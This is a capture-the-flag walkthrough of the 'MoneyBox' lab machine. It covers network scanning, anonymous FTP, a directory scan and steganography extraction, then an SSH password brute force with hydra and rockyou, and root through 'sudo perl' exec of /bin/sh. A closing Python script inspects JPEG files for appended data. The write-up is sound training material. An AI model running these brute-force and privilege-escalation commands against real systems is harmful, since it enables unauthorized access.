main

```
arp-scan -l
```

```
Interface: eth0, type: EN10MB, MAC: 08:00:27:82:4b:5b, IPv4: 192.168.43.160
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1	12:dd:b5:07:19:10	(Unknown: locally administered)
192.168.43.73	2c:9c:58:8e:96:a5	(Unknown)
192.168.43.74	08:00:27:cf:d8:16	PCS Systemtechnik GmbH
192.168.43.73	2c:9c:58:8e:96:a5	(Unknown) (DUP: 2)
```
```
nmap -p- -A -T5 192.168.43.73
```

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.43.160
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:D8:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
```
Anonymous FTP login is allowed; downloading from it yields a single image, trytofind.jpg.

```
ftp 192.168.43.74
Anonymous
ls
get trytofind.jpg
exit
```
Directory scan:

```
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -k -t 30 -b "404,500"
```

```
[07:01:02] 301 - 314B - /blogs -> http://192.168.43.74/blogs/
```
In the page source of /blogs:

```
<!--the hint is the another secret directory is S3cr3t-T3xt-->
```
Visiting /S3cr3t-T3xt gives the following page:

```
<h1>I'm T0m-H4ck3r</h1><br>
<p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
<p>If You Want Hint For Next Step......?<p>
```

==> key:3xtr4ctd4t4
Trying an SSH login as T0m-H4ck3r:3xtr4ctd4t4 fails.

Brute-forcing parameters on /S3cr3t-T3xt turns up nothing either.

The key is probably meant as a hint: "extract", i.e. extract hidden data from the image.
```
binwalk -e trytofind.jpg --run-as=root   # nothing found
```

```
steghide extract -sf trytofind.jpg
Enter passphrase:
wrote extracted data to "data.txt".
data.txt  reports  trytofind.jpg
```
This yields data.txt:

```
Hello..... renu
I tell you something Important.Your Password is too Week
So Change Your Password
Don't Underestimate it.......
```

That gives us the username renu.
```
hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.74
```

The password brute-force succeeds and we can log in:
login: renu password: 987654321
renu is not a convenient foothold for escalation, so we move laterally to lily.

```
ssh lily@127.0.0.1
```
```
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
```

```
sudo perl -e 'exec "/bin/sh";'
```

Privilege escalation succeeds.
```
root@MoneyBox:~# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
It's My First CTF Box

instagram : ____kirthik____

See You Back....
```

Afterword: a fairly routine box overall, but I need to brush up on image steganography and extraction (a .txt file was stuffed inside a picture).
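On the afterword's point about a text file hiding inside a picture: this added example (not from the original writeup) walks a JPEG's marker segments and reports anything appended after the End-Of-Image marker, which is the naive "concatenate a file onto the image" trick that binwalk looks for. It also shows why that check stays quiet on this box: steghide embeds in the DCT coefficients of the scan data, so the segment layout looks entirely normal. The sample image bytes and the appended note are constructed here.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}          # TEM and RSTn: markers with no length field

def walk_jpeg(data: bytes):
    """Return (segments, trailing): segments is a list of (marker, declared length),
    trailing is every byte after EOI. Appended files land in trailing; steghide's
    DCT-coefficient embedding changes nothing in this layout and stays invisible here."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos, segments = 2, [("SOI", 0)]
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                       # 0xFF fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            segments.append(("EOI", 0))
            return segments, data[pos + 2:]
        if marker in STANDALONE:
            segments.append((f"{marker:02X}", 0))
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        segments.append((f"{marker:02X}", length))
        pos += 2 + length
        if marker == SOS:
            # entropy-coded scan data follows; skip to the next real marker, treating
            # 0xFF00 (stuffed byte) and 0xFFD0-0xFFD7 (restart markers) as scan data
            while pos + 1 < len(data):
                if data[pos] == 0xFF and data[pos + 1] not in (0x00, *range(0xD0, 0xD8)):
                    break
                pos += 1
    return segments, b""                         # truncated file: no EOI found

# Constructed sample: a minimal JPEG (SOI, JFIF APP0, SOS with a few scan bytes that
# include a stuffed 0xFF00 and an RST0 marker, EOI), then the same image with a note
# appended after EOI, the way a naive "hide a .txt in a picture" trick works.
CLEAN_JPEG = (b"\xff\xd8"
              + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
              + b"\x12\xff\x00\x34\xff\xd0\x56"
              + b"\xff\xd9")
APPENDED_NOTE = b"Hello..... renu (constructed hidden note)"
APPENDED_JPEG = CLEAN_JPEG + APPENDED_NOTE
```

Run `walk_jpeg` over a real file's bytes to list its segments; a non-empty trailing value means something was appended, while an empty one only rules out that one hiding method.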